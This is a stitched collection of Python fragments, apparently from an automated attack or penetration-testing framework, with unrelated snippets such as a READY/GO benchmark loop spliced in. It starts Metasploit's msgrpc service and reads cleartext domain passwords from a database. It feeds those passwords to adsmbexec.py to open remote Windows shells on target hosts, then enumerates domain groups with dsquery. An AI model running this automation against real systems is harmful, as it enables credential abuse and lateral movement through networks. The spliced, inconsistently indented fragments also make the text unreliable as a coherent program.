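    def startMetasploit(self, username, password, port):
        """Launch msfconsole and load the msgrpc plugin on 127.0.0.1:<port>.

        Spawns ``msfconsole`` as an asyncproc child, waits for the console
        prompt, sends ``load msgrpc User=... Pass=... ServerPort=...`` and
        then waits for the plugin's "Successfully loaded" banner.  Gives up
        after 60 seconds, or earlier if the console exits, and in that case
        terminates the child so no orphaned msfconsole is left behind.

        Args:
            username: msgrpc user name handed to the plugin.
            password: msgrpc password.  It has to be written to the console
                to configure the plugin, but it is never echoed to stdout by
                this method (the original printed it in clear).
            port: TCP port the msgrpc server should listen on.

        Side effects: sets ``self.metasploitProcess`` and prints progress.
        Returns None; success is only reported through the printed message,
        as in the original.
        """
        import signal  # only needed to stop a console that failed to start

        print("starting metasploit ...")
        self.metasploitProcess = asyncproc.Process(
            "msfconsole -m software/metasploit/modules/".split())

        # msfconsole's ANSI-coloured prompt, seen once the console accepts
        # commands.  The original searched repr(out) for repr(prompt), which
        # (because repr adds the surrounding quotes) only matched when a read
        # chunk was *exactly* the prompt; a plain substring search is what
        # was intended.
        prompt = "\x1b[4mmsf\x1b[0m \x1b[0m> "
        rpcStarted = False
        rpcRunning = False
        startTime = time.time()

        while not rpcRunning:
            if time.time() - startTime >= 60:
                print("timeout.will try again")
                break

            exited = self.metasploitProcess.wait(os.WNOHANG)
            out = self.metasploitProcess.read()

            # The console has exited and nothing is left to read: waiting
            # for the 60 s timeout (as the original did) gains nothing.
            if exited is not None and out == "":
                print("msfconsole exited before msgrpc was loaded")
                break

            if out == "":
                time.sleep(0.25)  # avoid spinning on an empty read
                continue

            if rpcStarted:
                if out.find("Successfully loaded plugin: msgrpc") != -1:
                    rpcRunning = True
            elif out.find(prompt) != -1:
                time.sleep(1)
                self.metasploitProcess.write(
                    "load msgrpc User={0} Pass={1} ServerPort={2}\n".
                    format(username, password, port))
                rpcStarted = True

        if rpcRunning:
            # The caller supplied the password; do not leak it to stdout,
            # which is routinely captured in logs.
            print("metasploit running on 127.0.0.1:{0} as msgrpc user {1}".format(
                port, username))
        else:
            print("there was a error starting the metasploit console")
            # The original sent signal 0, which only probes whether the
            # process exists and never kills it; SIGTERM actually stops it.
            try:
                self.metasploitProcess.kill(signal.SIGTERM)
            except OSError:
                pass  # already gone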
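def GetProcess(params, domain, username, password, host):
    """Spawn ``adsmbexec.py`` against *host* and wait for a remote shell.

    Returns the live ``asyncproc.Process`` once the child prints a chunk
    containing "Windows" (taken as the remote shell banner).  Returns
    ``None`` when the child reports "SMB SessionError", exits without a
    shell, or produces no shell within 60 seconds; in every ``None`` case the
    child is terminated so it does not linger.  (The original returned a
    shell-less, still-running process on timeout and never read the
    ``gotShell`` flag it set.)

    Args:
        params: object exposing ``log(msg)``; receives the audit log line.
        domain, username, password: credential passed to adsmbexec as
            ``DOMAIN/USER:PASS@HOST``.
        host: target host.

    Security notes:
      * The password is part of the child's argv and therefore visible to
        every local user via ``ps``/``/proc`` while the child runs.  That is
        how adsmbexec.py is driven here and is left unchanged; avoid running
        this on a shared host.
      * The password is **not** written to ``params.log`` (the original
        logged the complete command line including the secret).
    """
    import signal  # only needed to stop a child we will not return

    params.log("./software/adsmbexec.py {}/{}:<redacted>@{}".format(
        domain, username, host))
    proc = asyncproc.Process([
        "./software/adsmbexec.py",
        "{}/{}:{}@{}".format(domain, username, password, host)
    ])

    gotShell = False
    startTime = time.time()
    while True:
        exited = proc.wait(os.WNOHANG)
        out = proc.read()
        time.sleep(0.25)

        if time.time() - startTime >= 60:
            break

        if out != "":
            print(out)

        if out.find("Windows") > -1:
            gotShell = True
            break
        if out.find("SMB SessionError") > -1:
            break
        # "The target principal name is incorrect" and "'dsquery' is not
        # recognized ..." only set a flag the original never read and did not
        # end the wait, so they are intentionally not special-cased here.

        # Child has exited and nothing is buffered: waiting longer is pointless.
        if exited is not None and out == "":
            break

    if gotShell:
        return proc

    # No usable shell: do not leak a running (or hung) adsmbexec.
    try:
        proc.kill(signal.SIGTERM)
    except OSError:
        pass  # already exited
    return None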
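 def __init__(self, cmd, env=None):
     """Start *cmd* as an asyncproc child whose stderr is discarded.

     Args:
         cmd: command for the child, passed to ``asyncproc.Process``
             unchanged (an argv list involves no shell).
         env: environment for the child.  ``None`` (the default) or an empty
             mapping gives the child an *empty* environment, not the
             parent's -- callers that need PATH or HOME in the child must
             pass them explicitly.  This matches the original ``env or {}``.
     """
     import os

     # Open the null device portably and close our copy once the child has
     # been spawned; the child keeps its own duplicated descriptor.  The
     # original used the Python-2-only ``file()`` builtin and never closed
     # the handle.  Assumes asyncproc.Process has spawned the child by the
     # time its constructor returns (it wraps subprocess.Popen) -- confirm.
     devnull = open(os.devnull, "w")
     try:
         self.process = asyncproc.Process(cmd,
                                          stderr=devnull,
                                          env=env or {})
     finally:
         devnull.close()
     self._read_buffer = ""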
                  '--args',
                  dest='args',
                  help='Command line arguments to pass to --executable')
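parser.add_option('-n',
                  '--num_trials',
                  type='int',
                  default=10000,
                  dest='num_trials',
                  help='The number of iterations to run')
(options, args) = parser.parse_args()

# --executable is required and --args is optional.  Without these guards a
# missing --executable puts None into the child's argv and a missing --args
# raises AttributeError on ``None.split``.
if not options.executable:
    parser.error('--executable is required')

# The child gets an argv list, never a shell string, so arguments are passed
# verbatim (no shell quoting or injection).  --args is split on whitespace
# only; it is not parsed like a shell command line.  Using split() rather
# than split(' ') avoids handing the child empty-string arguments for runs
# of spaces.
process_args = [options.executable]
if options.args:
    process_args.extend(options.args.split())
process = asyncproc.Process(process_args)

# Block until the child announces it is ready.  read() returns whatever is
# buffered (possibly ""), so this spins until one read yields exactly the
# READY token on its own line.
line = ''
while not line.strip() == 'READY':
    line = process.read()
line = ''

start = datetime.datetime.now()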
for i in xrange(options.num_trials):
    process.write('GO\n')
    found_ready = False
    while not found_ready:
        data = process.read()
        # Note: This isn't very robust. If a read returns part of the READY
        # token (e.g. REA) we don't buffer it and won't notice when the rest of
        # the token appears next time.
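def run(params):
    """Enumerate domain groups on one pending host with adsmbexec + dsquery.

    Picks one (domain, host, credential) row that still needs group
    enumeration, registers a task for it (``addTaskListItem``), spawns
    ``./software/adsmbexec.py`` with that credential, waits for the remote
    shell, runs ``dsquery group -limit 0`` and stores every group name via
    ``addDomainGroup``.  A credential that yields no usable shell, or a host
    without dsquery, is marked ``dgu_failed``; a clean run marks the domain
    ``info_gathered``.  Whatever ``params.log`` collected is drained from
    ``params.log_queue`` and attached to the task via ``updateTaskStatus``.

    Args:
        params: project context exposing ``db`` (DB-API connection),
            ``footprint_id``, ``log(msg)`` and ``log_queue``.

    Returns:
        None.  Results go to the database and to ``params.log``.

    Security notes:
      * adsmbexec.py takes the credential as ``DOMAIN/USER:PASS@HOST`` on its
        command line, so the cleartext password is visible to local users via
        ``ps`` while the child runs.  That is the tool's interface and is
        unchanged here, but the password is no longer copied into
        ``params.log`` (the original logged the full command).
      * Group names are untrusted output from the remote host; they only
        reach the database as bound query parameters.
    """
    sql = """
select
    d.id,
    hd.ip_address,
    dc.domain, dc.username, dc.cleartext_password,
    m.id
from
    domains d
    join domain_credentials dc on d.domain_name = dc.domain
    join domain_credentials_map m on m.domain_credentials_id = dc.id
    join host_data hd on m.host_data_id = hd.id
where
    d.footprint_id = dc.footprint_id and
    d.footprint_id = hd.footprint_id and
    d.footprint_id = m.footprint_id and
    m.valid = true and
    d.info_gathered = false and
    m.psexec_failed = false and
    m.dgu_failed = false and
    d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and
    hd.footprint_id = %s order by username limit 1
        """

    row = _run_fetchone(params, sql, (params.footprint_id, params.footprint_id, ))
    if row is None:
        return

    domain_id, host_ip, domain, username, password, map_id = row
    task_id = _run_fetchone(
        params,
        "select addTaskListItem(%s, 20, %s, true, false)",
        (params.footprint_id, domain_id, ))[0]

    # Log the command with the secret redacted; the real argv must still
    # carry it because that is how adsmbexec.py takes credentials.
    params.log("./software/adsmbexec.py {}/{}:<redacted>@{}".format(
        domain, username, host_ip))
    proc = asyncproc.Process([
        "./software/adsmbexec.py",
        "{}/{}:{}@{}".format(domain, username, password, host_ip)
    ])

    gotShell, runWithDifferentUser, out = _run_wait_for_shell(params, proc)

    if gotShell:
        out = runCmd(proc, "dsquery group -limit 0")
        if not _run_store_groups(params, domain_id, out):
            runWithDifferentUser = True
        time.sleep(0.5)
        # Let adsmbexec exit on its own so it can do its own cleanup on the
        # target; it is deliberately not signalled here.
        proc.write("exit\n")
        time.sleep(2)
    else:
        # No shell: the original left the child running (or orphaned it by
        # dropping the reference); stop it so it does not linger.
        _run_terminate(proc)

    # The original issued this update twice (before and after dsquery); the
    # flag is only ever raised, never cleared, so once at the end suffices.
    if runWithDifferentUser:
        _run_execute(
            params,
            "update domain_credentials_map set dgu_failed = true where id = %s",
            (map_id, ))

    # ``out`` is the dsquery output on success, otherwise the last chunk read
    # while waiting.  The original tested ``out is not ""`` -- an identity
    # comparison that only worked through CPython's interning of "".
    if out != "" and not runWithDifferentUser:
        _run_execute(params,
                     "update domains set info_gathered = true where id = %s",
                     (domain_id, ))

    chunks = []
    while not params.log_queue.empty():
        chunks.append("{0}".format(params.log_queue.get(False)))
    final_output = "\r\n".join(chunks)

    _run_execute(
        params,
        "select updateTaskStatus(%s, %s, %s, %s)",
        (task_id, False, True, base64.b64encode(final_output), ))


def _run_execute(params, sql, args):
    """Run one parameterised statement on a fresh cursor and close it."""
    cursor = params.db.cursor()
    try:
        cursor.execute(sql, args)
    finally:
        cursor.close()


def _run_fetchone(params, sql, args):
    """Run one parameterised query and return its first row (or None)."""
    cursor = params.db.cursor()
    try:
        cursor.execute(sql, args)
        return cursor.fetchone()
    finally:
        cursor.close()


def _run_terminate(proc):
    """Best-effort SIGTERM for an adsmbexec child that will not be used."""
    import signal
    try:
        proc.kill(signal.SIGTERM)
    except OSError:
        pass  # already exited


def _run_wait_for_shell(params, proc):
    """Read adsmbexec output for up to 60 s, looking for a shell or a failure.

    Returns ``(gotShell, credentialFailed, lastOutput)``.  ``credentialFailed``
    mirrors the original ``runWithDifferentUser`` flag: it is raised for the
    SMB/RPC errors below, which mean this credential will not work on this
    host.  Every non-empty chunk is forwarded to ``params.log``.
    """
    # Errors that end the wait immediately.
    fatal = ("STATUS_SHARING_VIOLATION",
             "SMB SESSIONERROR",
             "RPC_X_BAD_STUB_DATA",
             "UNEXPECTED ANSWER FROM SERVER")
    # Errors that only flag the credential; the original kept waiting.
    nonfatal = ("THE TARGET PRINCIPAL NAME IS INCORRECT",
                "'DSQUERY' IS NOT RECOGNIZED AS AN INTERNAL OR EXTERNAL COMMAND")

    gotShell = False
    credentialFailed = False
    out = ""
    startTime = time.time()
    while True:
        exited = proc.wait(os.WNOHANG)
        out = proc.read()
        time.sleep(0.25)

        if time.time() - startTime >= 60:
            params.log("too much time has passed. quitting")
            break

        if out != "":
            params.log(out)

        upper = out.upper()
        if "WINDOWS" in upper:
            gotShell = True
            break
        if any(marker in upper for marker in fatal):
            credentialFailed = True
            break
        if any(marker in upper for marker in nonfatal):
            credentialFailed = True
            # TODO(original): update this host, set psexec_failed = true

        # Child has exited and nothing is buffered: the original would have
        # spun until the 60 s timeout here.
        if exited is not None and out == "":
            break

    return gotShell, credentialFailed, out


def _run_store_groups(params, domain_id, out):
    """Parse ``dsquery group`` output and store each group via addDomainGroup.

    Stops at the first empty line, as the original did.  Returns False when
    the output says dsquery is not available on the host, True otherwise.
    """
    for line in out.split("\n"):
        params.log(line)
        if line.find("'dsquery' is not recognized as an internal or external command") != -1:
            return False
        if line == "":
            break
        # Lines look like ``"CN=Group Name,OU=...,DC=..."``; the group name is
        # the value of the first RDN.  A line without "=" (stray tool output)
        # is skipped rather than raising IndexError, which in the original
        # aborted the run before updateTaskStatus was ever reached.
        parts = line.split(",")[0].split("=")
        if len(parts) < 2:
            continue
        name = parts[1]
        if name.find("{") == -1:
            _run_execute(params,
                         "select addDomainGroup(%s, %s, %s)",
                         (params.footprint_id, domain_id, name, ))
    return True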
	def __call__(self, *args, **kwargs):
		"""Spawn ``self.execPath`` with *args* as its arguments and return its pipes.

		The command is handed to asyncproc as an argv list, so no shell is
		involved and every argument is passed verbatim.  *kwargs* is accepted
		but ignored.  NOTE(review): asyncproc.Process wraps its Popen privately
		and may not expose ``stdin``/``stdout``/``stderr`` attributes the way
		subprocess.Popen does -- confirm before relying on this.
		"""
		argv = [self.execPath]
		argv.extend(args)
		child = asyncproc.Process(argv)
		return Pipes(i=child.stdin, out=child.stdout, err=child.stderr)
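def GetProcess(params, domain, username, password, host, map_id):
    """Spawn ``adsmbexec.py`` against *host*, wait for a shell, record failures.

    Returns the live ``asyncproc.Process`` once the child prints a chunk
    containing "Windows" (taken as the remote shell banner).  Returns
    ``None`` when the child reports one of the SMB/RPC errors below, exits
    without a shell, or produces no shell within 60 seconds; in every
    ``None`` case the child is terminated so it does not linger.  (The
    original returned a shell-less, still-running process on timeout and
    never read the ``gotShell`` flag it set.)

    Whenever a credential error was seen -- even if a shell still appeared
    afterwards, as in the original -- ``domain_credentials_map.dgu_failed``
    is set for *map_id*.

    Args:
        params: project context exposing ``db`` (DB-API connection).
        domain, username, password: credential passed to adsmbexec as
            ``DOMAIN/USER:PASS@HOST``.
        host: target host.
        map_id: ``domain_credentials_map.id`` to flag on failure.

    Security note: the password is part of the child's argv and therefore
    visible to local users via ``ps``/``/proc`` while the child runs; that
    is how adsmbexec.py is driven here.  Nothing in this function writes the
    password to a log.
    """
    import signal  # only needed to stop a child we will not return

    # Errors that end the wait immediately.
    fatal = ("STATUS_SHARING_VIOLATION",
             "SMB SESSIONERROR",
             "RPC_X_BAD_STUB_DATA",
             "UNEXPECTED ANSWER FROM SERVER")
    # Errors that only flag the credential; the wait continues.
    nonfatal = ("THE TARGET PRINCIPAL NAME IS INCORRECT",
                "'DSQUERY' IS NOT RECOGNIZED AS AN INTERNAL OR EXTERNAL COMMAND")

    proc = asyncproc.Process([
        "./software/adsmbexec.py",
        "{}/{}:{}@{}".format(domain, username, password, host)
    ])
    runWithDifferentUser = False
    gotShell = False
    startTime = time.time()
    while True:
        exited = proc.wait(os.WNOHANG)
        out = proc.read()
        time.sleep(0.25)

        if time.time() - startTime >= 60:
            break

        if out != "":
            print(out)

        upper = out.upper()
        if "WINDOWS" in upper:
            gotShell = True
            break
        if any(marker in upper for marker in fatal):
            runWithDifferentUser = True
            break
        if any(marker in upper for marker in nonfatal):
            runWithDifferentUser = True
            # TODO(original): update this host, set psexec_failed = true

        # Child has exited and nothing is buffered: waiting longer is pointless.
        if exited is not None and out == "":
            break

    if runWithDifferentUser:
        cursor = params.db.cursor()
        try:
            cursor.execute(
                "update domain_credentials_map set dgu_failed = true where id = %s",
                (map_id, ))
        finally:
            cursor.close()

    if gotShell:
        return proc

    # No usable shell: do not leak a running (or hung) adsmbexec.
    try:
        proc.kill(signal.SIGTERM)
    except OSError:
        pass  # already exited
    return None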